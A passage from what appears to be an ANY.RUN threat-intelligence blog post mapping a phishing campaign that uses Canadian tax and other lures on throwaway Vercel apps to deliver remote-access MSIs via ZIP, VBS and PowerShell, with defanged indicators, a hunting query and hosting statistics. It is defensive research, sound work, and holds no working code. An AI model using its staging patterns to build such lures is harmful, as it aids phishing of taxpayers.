table#wpdtSimpleTable-361{ table-layout: fixed !important; }
table#wpdtSimpleTable-361 td, table.wpdtSimpleTable361 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">Those measured artifacts cover the GoTo and LogMeIn slot only. </p>



<p class="wp-block-paragraph">The RMM stage is the thinnest layer of evidence in the chain: 20 of the 137 arm cases are observed fetching the MSI, while the rest stop at the password-protected archive, and the same MSI appears in 150 cases index-wide, so it is staged across delivery arms beyond this kit. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="908" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Infrastructure-Mapping-908x1024.png" alt="" class="wp-image-22857" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Infrastructure-Mapping-908x1024.png 908w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Infrastructure-Mapping-266x300.png 266w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Infrastructure-Mapping-768x867.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Infrastructure-Mapping-1361x1536.png 1361w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Infrastructure-Mapping-1815x2048.png 1815w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Infrastructure-Mapping-370x417.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Infrastructure-Mapping-270x305.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Infrastructure-Mapping-740x835.png 740w" sizes="auto, (max-width: 908px) 100vw, 908px" /><figcaption class="wp-element-caption">Network Infrastructure of the campaign. ANY.RUN</figcaption></figure>



<p class="wp-block-paragraph">Neither the staging host nor the RMM backend identifies the operator. The MSI sits on shared, abused cloud storage, and the backend is each vendor’s own infrastructure, so neither layer establishes that one operator is behind all of it. The delivery kit’s handwriting is what ties the activity together. </p>



<p class="wp-block-paragraph">The fact that the product in the RMM slot changes between arms is another reason why this slot is the weakest layer for building a durable signature.  </p>



<h3 class="wp-block-heading">Cluster Expansion </h3>



<p class="wp-block-paragraph">The CRA/T4 arm is one part of a broader delivery framework whose document themes, domains, and RMM payloads change while the underlying kit remains stable. The shared fmtt web font (img/font1.woff2) provides a particularly strong pivot into that wider activity. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="966" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Lure-Variants-1024x966.png" alt="" class="wp-image-22858" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Lure-Variants-1024x966.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Lure-Variants-300x283.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Lure-Variants-768x724.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Lure-Variants-1536x1449.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Lure-Variants-2048x1932.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Lure-Variants-370x349.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Lure-Variants-270x255.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Campaign-Lure-Variants-740x698.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Cluster expansion graph. ANY.RUN </figcaption></figure>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-362"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="3"
           data-wpID="362"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Arm                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        How to recognize it                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Payload / behaviour                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        CRA/T4 Word on Vercel                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        icons8-microsoft-word-94.png (id=fd, alt=‘PDF Icon’) +secure.html +project/*.zip on*.vercel[.]app; access-code ZIP                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Password-ZIP to VBS to PowerShell to GoToResolve / LogMeInRescue MSI                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Adobe-PDF / SSA / compromised-WordPress siblings                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Same fmtt /font1.woff2 font; paths /pdfviewer-updater/,/admin/ssaa/, /wp-content/file/                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        ScreenConnect / ConnectWise / other RMM tooling, plus Telegram victim-filtering                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-362'>
table#wpdtSimpleTable-362{ table-layout: fixed !important; }
table#wpdtSimpleTable-362 td, table.wpdtSimpleTable362 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">To determine whether this is a shared phishing-as-a-service kit with several affiliates, we can use <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> for <a href="https://any.run/cybersecurity-blog/proactive-threat-hunting/" target="_blank" rel="noreferrer noopener">cluster expansion</a>: </p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-campaign-malware-analysi&amp;utm_term=250826&amp;utm_content=linktoservice/#{%22query%22:%22url:%5C%22*img/font1.woff2%5C%22%20OR%20url:%5C%22*/icons8-microsoft-word-94.png%5C%22%20OR%20SHA256:%5C%2251f0cc172ced2e90acbc01c2872c697644380e597076350a6b286c96ab7ccb42%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">url:&#8221;*img/font1.woff2&#8243; OR url:&#8221;*/icons8-microsoft-word-94.png&#8221; OR SHA256:&#8221;51f0cc172ced2e90acbc01c2872c697644380e597076350a6b286c96ab7ccb42&#8243;</a> </p>



<p class="wp-block-paragraph">The query returns 601 analysis cases across the three indicators (at the time of writing). The font alone links 425 distinct kit URLs across 240 hosts and 155 IPs between February 5 and July 29, 2026, exposing activity well beyond the CRA/T4 arm. </p>



<p class="wp-block-paragraph">The same fingerprint produced no matches across roughly 46,000 cases from ten unrelated malware families, supporting its use as an operation-specific marker rather than a generic web artifact. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Hunt threats proactively with threat data from <span class="highlight">16K+ orgs</span> <br>
to expand detection coverage and reduce risk 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=us-campaign-malware-analysi&#038;utm_term=250826&#038;utm_content=linktotilookuplanding#contact-sales" rel="noopener" target="_blank">
Try TI Lookup for Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">Infrastructure Footprint </h3>



<p class="wp-block-paragraph">The font1.woff2 query provides a direct measure of the family’s delivery infrastructure. Across 174 days, it identified 425 distinct kit URLs on 240 hosts resolving to 155 IPs. </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-363"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="9"
           data-wpID="363"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Measure                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Value                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Distinct kit URLs                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        425                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Unique hosts serving the kit                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        240                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Unique resolving IPs                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        155                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Observation window                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        5 February to 29 July 2026 (174 days)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Hosts seen within a single day                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        225 of 240 (94%)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Hosts seen over 3 days or less                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        228 of 240 (95%)                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Longest-lived host                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        docshared[.]org — 23 days                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Busiest host                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        dashboarduat.paynnow[.]com — 45 kit URLs in 11.5 days                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-363'>
table#wpdtSimpleTable-363{ table-layout: fixed !important; }
table#wpdtSimpleTable-363 td, table.wpdtSimpleTable363 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">The hosting breakdown shows how this infrastructure is distributed across different host types: </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-364"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="8"
           data-wpID="364"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Hosting type                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Hosts                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Kit URLs                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Conventional websites (compromised or stood up)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        117                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        257                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Vercel —*.vercel[.]app                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        82                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        82                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Throwaway registrations on cheap TLDs (.vu,.sbs, .cfd, .icu,.top, .one, .cyou,.shop, .online,.site)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        32                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        65                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Dynamic DNS (ddnsking[.]com,swoop2[.]me,letsgo2[.]me,net2me[.]me)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        7                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        19                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Netlify —*.netlify[.]app                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        1                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        1                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Backblaze B2 —f004.backblazeb2[.]com                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        1                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        1                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Total                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        240                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        425                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-364'>
table#wpdtSimpleTable-364{ table-layout: fixed !important; }
table#wpdtSimpleTable-364 td, table.wpdtSimpleTable364 th { white-space: normal !important; }
</style>




<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="823" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Hosts-by-Type-1024x823.png" alt="" class="wp-image-22859" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Hosts-by-Type-1024x823.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Hosts-by-Type-300x241.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Hosts-by-Type-768x617.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Hosts-by-Type-1536x1234.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Hosts-by-Type-2048x1645.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Hosts-by-Type-370x297.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Hosts-by-Type-270x217.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Hosts-by-Type-740x594.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Campaign&#8217;s hosts by hosting type. ANY.RUN</figcaption></figure>



<p class="wp-block-paragraph">Push-button deployment platforms account for 83 of the 240 hosts, with Vercel supplying 82 of them. Every Vercel app was observed on exactly one day with exactly one kit URL and was never reused, indicating a one-app-per-lure deployment model that makes domain-level blocking quickly obsolete. <br> </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-365"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="9"
           data-wpID="365"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Lure theme in the Vercel subdomain                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50%;                    padding:10px;
                    "
                    >
                                        Apps                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        CRA / T4 tax (2025t4ab1109061,crataxsummary1007341,officialsummarybycra)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        27                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Generic shared document / file transfer (shared-doc820848110641,newfilesshared)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        25                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Invoice / payment / VAT (invoice-49883-due,payment-recelpt)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        8                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Adobe / PDF / Flash updater (adobe-upd, pdfviewer-nu,flash-updater)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        7                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Streaming / invite / social (liveeventstream,kik2gethernow)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        7                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        US SSA / social security (socialsecuritystatementreceived0320)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        4                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Shipping and logistics (ups-aw,upsawb4290324)                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        4                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Total                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        82                     </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-365'>
table#wpdtSimpleTable-365{ table-layout: fixed !important; }
table#wpdtSimpleTable-365 td, table.wpdtSimpleTable365 th { white-space: normal !important; }
</style>




<p class="wp-block-paragraph">New hosts appear at a steady clip, while Vercel deployments arrive in bursts — 23 new apps in March, at the height of Canadian T4 season, and 20 more in July: </p>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-366"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="4"
           data-rows="8"
           data-wpID="366"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Month (2026)                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        New hosts                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        of which Vercelapps                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:25%;                    padding:10px;
                    "
                    >
                                        Kit URLs seen                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        February                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        18                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        6                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        29                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        March                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        43                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        23                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        59                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        April                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        45                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        10                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D4"
                    data-col-index="3"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        76                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        May                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        44                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        16                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D5"
                    data-col-index="3"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        115                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        June                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        33                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        7                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="D6"
                    data-col-index="3"
                    data-row-index="5"
                    style="                    padding:10px;
